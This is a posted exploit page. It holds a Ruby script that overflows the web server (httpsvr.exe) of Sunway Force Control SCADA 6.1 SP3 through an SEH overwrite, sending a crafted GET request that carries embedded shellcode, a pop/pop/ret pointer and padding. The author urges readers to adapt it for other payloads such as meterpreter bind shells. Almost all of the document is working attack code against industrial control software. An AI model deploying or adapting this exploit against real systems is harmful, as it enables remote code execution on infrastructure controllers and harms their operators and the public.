Home / exploits Sunway Force Control SCADA 6.1 SP3 SEH Overwrite
Posted on 27 August 2011
# Sunway Force Control SCADA httpsvr.exe Exploit # Exploitable with simple SEH Overwrite technique # Tested on XP SP0 English # Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer # Canberk BOLAT | @cnbrkbolat # cbolat.blogspot.com # for fun ;) # # notez: other payloads not working stable because of memory region's status. # i tested meterpreter/bind_tcp and others some of them not work because of # trying to write to unwritable memory regions. # if you write some asm for changing access protection of memory region # it can be work. try it, do it! # # Vendor: http://www.sunwayland.com.cn/ def send(packet) begin sock = TCPSocket.new(@ip, @port) sock.write(packet) rescue Exception => e return false else resp = sock.recv(1024) sock.close return true end end @ip = ARGV[0] @port = 80 # windows/exec CMD=calc.exe shellcode = "xb8xd5x45x06xc4xdaxdexd9x74x24xf4x5bx33xc9" + "xb1x33x31x43x12x03x43x12x83x3exb9xe4x31x3c" + "xaax60xb9xbcx2bx13x33x59x1ax01x27x2ax0fx95" + "x23x7exbcx5ex61x6ax37x12xaex9dxf0x99x88x90" + "x01x2cx15x7exc1x2exe9x7cx16x91xd0x4fx6bxd0" + "x15xadx84x80xcexbax37x35x7axfex8bx34xacx75" + "xb3x4exc9x49x40xe5xd0x99xf9x72x9ax01x71xdc" + "x3bx30x56x3ex07x7bxd3xf5xf3x7ax35xc4xfcx4d" + "x79x8bxc2x62x74xd5x03x44x67xa0x7fxb7x1axb3" + "xbbxcaxc0x36x5ex6cx82xe1xbax8dx47x77x48x81" + "x2cxf3x16x85xb3xd0x2cxb1x38xd7xe2x30x7axfc" + "x26x19xd8x9dx7fxc7x8fxa2x60xafx70x07xeax5d" + "x64x31xb1x0bx7bxb3xcfx72x7bxcbxcfxd4x14xfa" + "x44xbbx63x03x8fxf8x9cx49x92xa8x34x14x46xe9" + "x58xa7xbcx2dx65x24x35xcdx92x34x3cxc8xdfxf2" + "xacxa0x70x97xd2x17x70xb2xb0xf6xe2x5ex19x9d" + "x82xc5x65" payload = "H" * 1599 payload << "xebx06x90x90" # Pointer to Next SE Handler payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r payload << "x90" * 40 payload << shellcode payload << "x90" * (4058 - shellcode.length) pack = "GET /#{payload} HTTP/1.1 " pack << "Host: http://#{@ip}:#{@port} " puts "packet sended." if send(pack)
